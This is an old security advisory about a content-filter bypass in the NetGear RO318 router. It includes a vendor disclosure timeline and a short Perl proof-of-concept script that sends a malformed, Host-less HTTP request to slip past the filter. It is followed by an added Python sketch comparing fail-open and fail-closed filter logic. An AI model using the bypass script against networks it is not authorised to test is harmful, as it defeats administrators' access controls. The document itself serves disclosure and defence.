`=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ NetGear RO318 HTTP Filter Advisory =+
=+ Null Byte Security =+
=+ http://home.tampabay.rr.com/nbs/ =+
=+ don't call it a come back =+
=+ [email protected] =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ Contents Table =+
=+ =+
=+ 1.About =+
=+ 2.Affected =+
=+ 3.Details =+
=+ 4.Contact =+
=+ 5.Conclusion =+
=+ 6.Thanks =+
=+ 7.Greets =+
=+ 8.POC =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 1.About =+
=+ =+
=+ NETGEAR's sturdy metal RO318 Cable/DSL Security Router with 8-port switch =+
=+ fully protects your small office network against intrusion. Equipped with =+
=+ Stateful Packet Inspection to prevent Denial of Service (DoS) attacks, and =+
=+ Network Address Translation (NAT) to maintain network security against =+
=+ hackers, it ensures prolonged up time and maximized productivity for your =+
=+ network. Web content filtering options let network administrators establish =+
=+ restricted access policies - based on the time of day, day of week, Web =+
=+ address keyword - and receive regular reports and instant alerts via e-mail on =+
=+ hacker attempts and browsing activities. Web-based installation instructions =+
=+ make setup easy. Your network up and running, and sharing high-speed Internet =+
=+ access with up to 253 users, in less than an hour. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 2.Affected =+
=+ =+
=+ NetGear RO318 Cable/DSL Security Router =+
=+ =+
=+ Although the NetGear RO318 is the only router listed here, we are sure there =+
=+ are other routers that use the RO318's web filtering technology. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 3.Details =+
=+ =+
=+ We are not too sure of the details ourselves because of time constraints, but =+
=+ we do have an idea. One, the web filtering component in the firmware only =+
=+ checks for fully constructed requests and thus sending a somewhat malformed =+
=+ request results in the retrieval of restricted content. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 4.Contact =+
=+ =+
=+ December 2 2001: Contacted NetGear =+
=+ December 2 2001: Contacted online support =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460001) =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460003) =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460006) =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460008) =+
=+ December 8 2001: Five working days passed =+
=+ December 20 2001: Eighteen days passed =+
=+ December 20 2001: Advisory released on home.tampabay.rr.com/nbs/ =+
=+ December 26 2001: POC released =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 5.Conclusion =+
=+ =+
=+ This is definitely a security vulnerability and not a feature. We hope =+
=+ NetGear will fix this with their next firmware release so administrators can =+
=+ restrict necessary web-content without having to worry about this bug. =+
=+ =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 6.Thanks =+
=+ =+
=+ Bi0cide for the help =+
=+ Datagram for the help =+
=+ Natas for the help =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 7.Greets =+
=+ =+
=+ Bi0cide, Natas, Datagram, Z, Medium, BrainStorm, Qitest1, Skerbi, RootX11, =+
=+ Doug, Bios Disk, Decypher, Notten, RFP, Johnny (johnny.ihackstuff.com), RFP, =+
=+ Mixter, Pimpshiz, Doxavg, Todd, Sekurity Inc (www.sekurity.net), Packet Storm, =+
=+ Security Focus, and everyone else. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 8.POC =+
=+ =+
#!/usr/bin/perl
#don't call it a come back
#[email protected]
use IO::Socket;
use Getopt::Std;

# -h <host> is required, -p <port> is optional (default 80)
getopts('h:p:z', \%argv);
if (!defined($argv{h}))
{
    print "NetGear RO318 Web Filter Bypass Exploit by Null Byte Security \n";
    print "Usage: $0 -h <host> -p <port> \n";
    exit;
}
&begin;

sub begin
{
    $html = "html";    # the response is appended to a file named "html"
    $host = $argv{h};
    $port = defined($argv{p}) ? $argv{p} : "80";
    $socket = IO::Socket::INET->new(Proto    => "tcp",
                                    PeerAddr => $host,
                                    PeerPort => $port)
        or die "Connection Refused.\n";
    # Minimal HTTP/1.0 request: no Host header, bare LF line endings
    print $socket "GET / HTTP/1.0\n\n";
    # Open the log once instead of once per response line
    open(LOG, ">>$html") or die "Cannot open $html: $!\n";
    while (<$socket>)
    {
        print LOG $_;
    }
    close(LOG);
    close $socket;
}
=+ =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ http://www.wiretrip.net/rfp/policy.html =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
`
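The failure mode described in section 3, modelled from the defender's side as an added example (not code from the advisory or from NetGear firmware): a filter that inspects only requests it recognises as fully constructed and forwards the rest, next to one that tolerates bare-LF requests and blocks what it cannot classify. The keyword, the function names and the filter internals are assumptions; the advisory itself says the exact cause was not confirmed.

```python
import re

BLOCKED_KEYWORDS = ("blocked-example",)  # constructed policy keyword

# Fail-open model: only a "fully constructed" request (CRLF line endings,
# Host header present) is recognised and inspected.
_WELL_FORMED = re.compile(
    rb"^(GET|POST|HEAD) (\S+) HTTP/1\.[01]\r\n(?:[^\r\n]+\r\n)*?Host: ([^\r\n]+)\r\n",
    re.I)

def fail_open_filter(raw: bytes) -> str:
    m = _WELL_FORMED.match(raw)
    if not m:
        return "ALLOW"  # unrecognised traffic is forwarded uninspected
    text = (m.group(2) + b" " + m.group(3)).decode("latin-1").lower()
    return "BLOCK" if any(k in text for k in BLOCKED_KEYWORDS) else "ALLOW"

def fail_closed_filter(raw: bytes) -> str:
    """Accept bare-LF line endings; block whatever cannot be classified."""
    head = raw.replace(b"\r\n", b"\n").split(b"\n\n", 1)[0]
    lines = head.decode("latin-1").split("\n")
    parts = lines[0].split()
    if len(parts) != 3 or not parts[2].upper().startswith("HTTP/"):
        return "BLOCK"  # not a parseable request line
    target, host = parts[1], None
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "host":
            host = value.strip()
    if host is None and not target.lower().startswith("http://"):
        return "BLOCK"  # destination name unknown, policy cannot be evaluated
    text = (target + " " + (host or "")).lower()
    return "BLOCK" if any(k in text for k in BLOCKED_KEYWORDS) else "ALLOW"

# Constructed sample requests
FULL = b"GET / HTTP/1.0\r\nHost: www.blocked-example.test\r\n\r\n"
MINIMAL = b"GET / HTTP/1.0\n\n"  # same shape as the request the POC sends
ALLOWED = b"GET /index.html HTTP/1.0\r\nHost: www.example.test\r\n\r\n"

def compare():
    """Return {sample name: (fail-open verdict, fail-closed verdict)}."""
    samples = (("full", FULL), ("minimal", MINIMAL), ("allowed", ALLOWED))
    return {n: (fail_open_filter(r), fail_closed_filter(r)) for n, r in samples}

if __name__ == "__main__":
    for name, verdicts in compare().items():
        print(name, verdicts)
```

Blocking Host-less HTTP/1.0 requests is a policy choice in this sketch; a filter that knows the destination address could classify on that instead.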